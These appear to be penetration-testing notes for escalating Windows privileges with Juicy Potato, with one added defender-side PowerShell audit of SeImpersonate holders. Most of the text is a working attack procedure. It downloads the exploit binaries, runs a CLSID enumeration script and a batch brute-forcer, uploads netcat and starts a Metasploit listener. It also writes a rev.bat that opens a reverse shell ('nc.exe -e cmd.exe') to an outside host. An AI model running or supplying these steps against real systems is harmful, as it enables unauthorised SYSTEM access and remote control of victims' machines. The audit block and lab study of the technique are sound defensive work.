Windows privilege escalation technique.
- Impersonating Privileges with Juicy Potato
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens
- Potatoes – Windows Privilege Escalation
Check if vulnerable
If winPEAS says the account has "SeImpersonatePrivilege" or "SeAssignPrimaryTokenPrivilege", try Juicy Potato.
whoami /priv
Check the architecture to know which version of JuicyPotato to use.
systeminfo | findstr "System Type"
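Defender-side counterpart to the check above, added here and not part of the original notes: it exports the local user-rights assignment and lists which principals hold the two privileges Juicy Potato depends on, so service accounts that do not need them can be reviewed. Assumes an elevated prompt; the temp file path is a constructed placeholder.

```powershell
# Added audit example (not from the original notes). Requires an elevated prompt.
$cfg = Join-Path $env:TEMP 'secpol_audit.inf'   # constructed scratch path
secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null

# secedit writes a [Privilege Rights] section with lines such as
#   SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
$pattern = '^(SeImpersonatePrivilege|SeAssignPrimaryTokenPrivilege)\s*='
$lines = Get-Content $cfg | Where-Object { $_ -match $pattern }

foreach ($line in $lines) {
    $name, $value = $line -split '=', 2
    $principals = $value.Trim() -split ',' | ForEach-Object {
        $entry = $_.Trim()
        if ($entry.StartsWith('*')) {
            # Entries prefixed with '*' are SIDs; translate to an account name where possible
            try {
                $sid = New-Object System.Security.Principal.SecurityIdentifier($entry.Substring(1))
                $sid.Translate([System.Security.Principal.NTAccount]).Value
            } catch { $entry }
        } else { $entry }
    }
    [pscustomobject]@{ Privilege = $name.Trim(); Principals = ($principals -join '; ') }
}

Remove-Item $cfg -ErrorAction SilentlyContinue
```

Compare the output against the accounts that actually run IIS, SQL Server or other services on the host; a custom service account listed here that does not need to impersonate clients is a candidate for removal from the policy.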
Exploit
Download the exploit
wget -O JuicyPotato.exe https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
X86 version
wget -O JuicyPotato.exe https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe
Script to enumerate CLSIDs (CLSID.ps1)
New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
$CLSID = Get-ItemProperty HKCR:\clsid\* | select-object AppID,@{N='CLSID'; E={$_.pschildname}} | where-object {$_.appid -ne $null}
foreach($a in $CLSID) {
Write-Host $a.CLSID
}
Try the exploit on every CLSID identified (exploit_brute_clsid.bat)
@echo off
SETLOCAL ENABLEDELAYEDEXPANSION
FOR /F %%i IN (CLSID.list) DO (
echo %%i
JuicyPotato.exe -p c:\<somepath>\rev.bat -l 9001 -t * -c %%i
set RET=!ERRORLEVEL!
)
Upload
Upload all the files + netcat
/usr/share/windows-resources/binaries/nc.exe
Start a listener
msfconsole
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST tun0
set LPORT 9001
set ExitOnSession false
exploit -j
Generate a reverse shell payload
echo c:\<somepath>\nc.exe -e cmd.exe x.x.x.x 9001 > rev.bat
Generate the list of CLSIDs
powershell -executionpolicy bypass -file CLSID.ps1 > CLSID.list
Execute the exploit – when knowing CLSID
privesc.exe -p c:\<somepath>\rev.bat -l 9001 -t * -c {<CLSID>}
Execute the exploit – when NOT knowing the CLSID
exploit_brute_clsid.bat
The listener should receive a connection.